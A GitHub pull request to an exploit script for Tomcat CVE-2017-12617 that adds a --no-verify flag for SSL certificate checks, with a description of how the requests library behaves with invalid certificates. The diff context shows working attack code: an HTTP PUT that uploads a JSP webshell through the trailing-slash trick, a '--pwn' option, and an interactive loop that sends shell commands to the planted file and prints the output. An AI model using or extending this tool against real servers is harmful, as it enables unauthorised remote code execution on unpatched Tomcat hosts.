### PR TITLE
Add a --no-verify optional argument.

### DIFF
--- a/tomcat-cve-2017-12617.py
+++ b/tomcat-cve-2017-12617.py
@@ -62,14 +62,14 @@ def removetags(tags):
 def getContent(url,f):
     headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
     requests.packages.urllib3.disable_warnings()
-    re=requests.get(str(url)+"/"+str(f), headers=headers, verify=False)
+    re=requests.get(str(url)+"/"+str(f), headers=headers, verify=opt.no_verify)
     return re.content
 
 def createPayload(url,f):
     evil='<% out.println("AAAAAAAAAAAAAAAAAAAAAAAAAAAAA");%>'
     headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
     requests.packages.urllib3.disable_warnings()
-    req=requests.put(str(url)+str(f)+"/",data=evil, headers=headers, verify=False)
+    req=requests.put(str(url)+str(f)+"/",data=evil, headers=headers, verify=opt.no_verify)
     if req.status_code==201:
         print "File Created .."
 
@@ -99,7 +99,7 @@ InputStreamReader(p.getInputStream()));
     
     headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
     requests.packages.urllib3.disable_warnings()
-    req=requests.put(str(url)+f+"/",data=EVIL, headers=headers, verify=False)
+    req=requests.put(str(url)+f+"/",data=EVIL, headers=headers, verify=opt.no_verify)
     
 
 
@@ -112,7 +112,7 @@ def shell(url,f):
         if cmd=="q" or cmd=="Q":
                 break
         requests.packages.urllib3.disable_warnings()
-        re=requests.get(str(url)+"/"+str(f),params=payload,headers=headers, verify=False)
+        re=requests.get(str(url)+"/"+str(f),params=payload,headers=headers, verify=opt.no_verify)
         re=str(re.content)
         t=removetags(re)
         print t
@@ -167,7 +167,7 @@ options:
 parse.add_option("-u","--url",dest="U",type="string",help="Website Url")          
 parse.add_option("-p","--pwn",dest="P",type="string",help="generate webshell and upload it")
 parse.add_option("-l","--list",dest="L",type="string",help="hosts File")
-
+parse.add_option('--no-verify', dest='no_verify', action='store_false', default=True, help='Ignore SSL certificate issues')
 (opt,args)=parse.parse_args()
 
 if opt.U==None and opt.P==None and opt.L==None:

--- a/tomcat-cve-2017-12617.py
+++ b/tomcat-cve-2017-12617.py
@@ -9,8 +9,6 @@ from optparse import OptionParser
 
 
 
-
-
 class bcolors:
     HEADER = '\033[95m'
     OKBLUE = '\033[94m'
@@ -63,12 +61,14 @@ def removetags(tags):
 
 def getContent(url,f):
     headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
+    requests.packages.urllib3.disable_warnings()
     re=requests.get(str(url)+"/"+str(f), headers=headers)
     return re.content
 
 def createPayload(url,f):
     evil='<% out.println("AAAAAAAAAAAAAAAAAAAAAAAAAAAAA");%>'
     headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
+    requests.packages.urllib3.disable_warnings()
     req=requests.put(str(url)+str(f)+"/",data=evil, headers=headers)
     if req.status_code==201:
         print "File Created .."
@@ -98,7 +98,7 @@ InputStreamReader(p.getInputStream()));
 
     
     headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
-    
+    requests.packages.urllib3.disable_warnings()
     req=requests.put(str(url)+f+"/",data=EVIL, headers=headers)
     
 
@@ -111,7 +111,7 @@ def shell(url,f):
         payload={'cmd':cmd}
         if cmd=="q" or cmd=="Q":
                 break
-        
+        requests.packages.urllib3.disable_warnings()
         re=requests.get(str(url)+"/"+str(f),params=payload,headers=headers)
         re=str(re.content)
         t=removetags(re)


### PR DESCRIPTION
The previously suggested fix of `requests.packages.urllib3.disable_warnings()` for [PR#3](https://github.com/cyberheartmi9/CVE-2017-12617/pull/3) doesn't actually work for `requests` when the SSL certificate is invalid. This function will only disable the warnings which occur when using `verify=False`. 

For example: 
`Python 2.7.13`:
```
>>> import requests
>>> proxies = {'http':'https://localhost:8080','https':'https://localhost:8080'}
>>> requests.get('https://www.google.com',proxies=proxies)
Traceback (most recent call last):
  File "<console>", line 1, in <module>
  File "/usr/local/lib/python2.7/site-packages/requests/api.py", line 72, in get
    return request('get', url, params=params, **kwargs)
  File "/usr/local/lib/python2.7/site-packages/requests/api.py", line 58, in request
    return session.request(method=method, url=url, **kwargs)
  File "/usr/local/lib/python2.7/site-packages/requests/sessions.py", line 518, in request
    resp = self.send(prep, **send_kwargs)
  File "/usr/local/lib/python2.7/site-packages/requests/sessions.py", line 639, in send
    r = adapter.send(request, **kwargs)
  File "/usr/local/lib/python2.7/site-packages/requests/adapters.py", line 512, in send
    raise SSLError(e, request=request)
SSLError: ("bad handshake: Error([('SSL routines', 'tls_process_server_certificate', 'certificate verify failed')],)",)
>>> requests.get('https://www.google.com',proxies=proxies, verify=False)
/usr/local/lib/python2.7/site-packages/requests/packages/urllib3/connectionpool.py:852: InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
  InsecureRequestWarning)
<Response [200]>
>>> requests.packages.urllib3.disable_warnings()
>>> requests.get('https://www.google.com', proxies=proxies)
Traceback (most recent call last):
  File "<console>", line 1, in <module>
  File "/usr/local/lib/python2.7/site-packages/requests/api.py", line 72, in get
    return request('get', url, params=params, **kwargs)
  File "/usr/local/lib/python2.7/site-packages/requests/api.py", line 58, in request
    return session.request(method=method, url=url, **kwargs)
  File "/usr/local/lib/python2.7/site-packages/requests/sessions.py", line 518, in request
    resp = self.send(prep, **send_kwargs)
  File "/usr/local/lib/python2.7/site-packages/requests/sessions.py", line 639, in send
    r = adapter.send(request, **kwargs)
  File "/usr/local/lib/python2.7/site-packages/requests/adapters.py", line 512, in send
    raise SSLError(e, request=request)
SSLError: ("bad handshake: Error([('SSL routines', 'tls_process_server_certificate', 'certificate verify failed')],)",)
>>> requests.get('https://www.google.com', proxies=proxies, verify=False)
<Response [200]>
```

Therefore, the `verify=False` is required in order to cause `requests` to allow for insecure requests when the SSL certificate cannot be trusted. I just made it so the user can specify whether the requests will be verified or not when running the tool by passing in a `--no-verify` option.